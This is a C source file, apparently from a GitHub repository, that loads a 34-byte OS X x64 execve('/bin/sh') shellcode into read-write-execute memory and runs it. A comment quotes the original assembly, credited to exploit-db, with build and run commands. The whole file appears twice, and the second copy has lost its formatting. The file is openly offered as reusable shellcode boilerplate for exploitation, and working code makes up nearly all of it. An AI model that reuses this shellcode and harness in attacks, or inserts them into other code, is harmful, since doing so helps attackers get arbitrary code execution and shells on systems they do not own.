wtfbbqhax/binsh.c

## binsh.c
//    *   .,..                 _     _            _
//  ` ,:':::`                 | |   (_)          | |
//   ::  ::::=.   .           | |__  _ _ __   ___| |__    ___
// \.:|| .::::|  ::           | '_ \| | '_ \ / __| '_ \  / __|
// /_.|| .:::::u:::   *       | |_) | | | | |\__ \ | | || (__
// .- ||______::::   .        |_.__/|_|_| |_||___/_| |_(_)___|
//    '-------::'
// \_\= /'::.':'
// ///_  - --_         Victor Roemer (wtfbbqhax), <victor@badsec.org>.
///._\=----                   Wrote sometime between 2014-2015
//
//        Original shellcode was obtained from exploit-db.com, can be seen in the
//                            comment block following main().

/* Q: Is it the last shellcode boiler-plate you'll ever use again?? */

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>

typedef void (*Func_t)(void);
typedef char const ByteCode[];

#define PROT_RWX (PROT_READ|PROT_WRITE|PROT_EXEC)
#define MAP_MINE (MAP_ANON|MAP_PRIVATE)

Func_t _NewFunc (ByteCode code, size_t size)
{
    void * ret = mmap(0, size, PROT_RWX, MAP_MINE, -1, 0);

    if ( ret == MAP_FAILED )
        return NULL;

    memcpy(ret, code, size);

    return (Func_t)ret;
}

#define NewFunc(code) _NewFunc(code, sizeof(code));

int main(int argc, char *argv[])
{
    ByteCode shellcode = {
        0x48, 0x31, 0xf6, 0x56, 0x48, 0xbf, 0x2f, 0x2f,
        0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x57, 0x48,
        0x89, 0xe7, 0x48, 0x31, 0xd2, 0x48, 0x31, 0xc0,
        0xb0, 0x02, 0x48, 0xc1, 0xc8, 0x28, 0xb0, 0x3b,
        0x0f, 0x05
    };

    Func_t binsh = NewFunc( shellcode );

    binsh( );

    return 0;
}

//////////////////////////////////////////// Original Shellcode //////////////

/*
[*] Author: Csaba Fitzl, @theevilbit
[*] Tested on OS X 10.10.5
[*] OS X x64 /bin/sh shellcode, NULL byte free, 34 bytes
[*] Assembly version
[*] binsh-shellcode.asm
[*] ./nasm -f macho64 binsh-shellcode.asm
[*] ld -macosx_version_min 10.7.0 -o binsh-shellcode binsh-shellcode.o

-------------------------------------------------------------------------------
BITS 64

global start

section .text

start:
    xor     rsi,rsi                 ;zero out RSI
    push    rsi                     ;push NULL on stack
    mov     rdi, 0x68732f6e69622f2f ;mov //bin/sh string to RDI (reverse)
    push    rdi                     ;push rdi to the stack
    mov     rdi, rsp                ;store RSP (points to the command string) in RDI
    xor     rdx, rdx                ;zero out RDX

    ;store syscall number on RAX
    xor     rax,rax                 ;zero out RAX
    mov     al,2                    ;put 2 to AL -> RAX = 0x0000000000000002
    ror     rax, 0x28               ;rotate the 2 -> RAX = 0x0000000002000000
    mov     al,0x3b                 ;move 3b to AL (execve SYSCALL#) -> RAX = 0x000000000200003b
    syscall                         ;trigger syscall
-------------------------------------------------------------------------------

[*] C version
[*] Get the hex opcodes from the object file: otool -t binsh-shellcode.o
[*] binsh-shellcode.c
[*] Compile: gcc binsh-shellcode.c -o sc
[*] Run: ./sc
*/
	// * .,.. _ _ _
	// ` ,:':::` \| \| (_) \| \|
	// :: ::::=. . \| \|__ _ _ __ ___\| \|__ ___
	// \.:\|\| .::::\| :: \| '_ \\| \| '_ \ / __\| '_ \ / __\|
	// /_.\|\| .:::::u::: * \| \|_) \| \| \| \| \|\__ \ \| \| \|\| (__
	// .- \|\|______:::: . \|_.__/\|_\|_\| \|_\|\|___/_\| \|_(_)___\|
	// '-------::'
	// \_\= /'::.':'
	// ///_ - --_ Victor Roemer (wtfbbqhax), <victor@badsec.org>.
	///._\=---- Wrote sometime between 2014-2015
	//
	// Original shellcode was obtained from exploit-db.com, can be seen in the
	// comment block following main().

	/* Q: Is it the last shellcode boiler-plate you'll ever use again?? */

	#include <stdio.h>
	#include <sys/mman.h>
	#include <string.h>

	typedef void (*Func_t)(void);
	typedef char const ByteCode[];

	#define PROT_RWX (PROT_READ\|PROT_WRITE\|PROT_EXEC)
	#define MAP_MINE (MAP_ANON\|MAP_PRIVATE)

	Func_t _NewFunc (ByteCode code, size_t size)
	{
	void * ret = mmap(0, size, PROT_RWX, MAP_MINE, -1, 0);

	if ( ret == MAP_FAILED )
	return NULL;

	memcpy(ret, code, size);

	return (Func_t)ret;
	}

	#define NewFunc(code) _NewFunc(code, sizeof(code));

	int main(int argc, char *argv[])
	{
	ByteCode shellcode = {
	0x48, 0x31, 0xf6, 0x56, 0x48, 0xbf, 0x2f, 0x2f,
	0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x57, 0x48,
	0x89, 0xe7, 0x48, 0x31, 0xd2, 0x48, 0x31, 0xc0,
	0xb0, 0x02, 0x48, 0xc1, 0xc8, 0x28, 0xb0, 0x3b,
	0x0f, 0x05
	};

	Func_t binsh = NewFunc( shellcode );

	binsh( );

	return 0;
	}

	//////////////////////////////////////////// Original Shellcode //////////////

	/*
	[*] Author: Csaba Fitzl, @theevilbit
	[*] Tested on OS X 10.10.5
	[*] OS X x64 /bin/sh shellcode, NULL byte free, 34 bytes
	[*] Assembly version
	[*] binsh-shellcode.asm
	[*] ./nasm -f macho64 binsh-shellcode.asm
	[*] ld -macosx_version_min 10.7.0 -o binsh-shellcode binsh-shellcode.o

	-------------------------------------------------------------------------------
	BITS 64

	global start

	section .text

	start:
	xor rsi,rsi ;zero out RSI
	push rsi ;push NULL on stack
	mov rdi, 0x68732f6e69622f2f ;mov //bin/sh string to RDI (reverse)
	push rdi ;push rdi to the stack
	mov rdi, rsp ;store RSP (points to the command string) in RDI
	xor rdx, rdx ;zero out RDX

	;store syscall number on RAX
	xor rax,rax ;zero out RAX
	mov al,2 ;put 2 to AL -> RAX = 0x0000000000000002
	ror rax, 0x28 ;rotate the 2 -> RAX = 0x0000000002000000
	mov al,0x3b ;move 3b to AL (execve SYSCALL#) -> RAX = 0x000000000200003b
	syscall ;trigger syscall
	-------------------------------------------------------------------------------

	[*] C version
	[*] Get the hex opcodes from the object file: otool -t binsh-shellcode.o
	[*] binsh-shellcode.c
	[*] Compile: gcc binsh-shellcode.c -o sc
	[*] Run: ./sc
	*/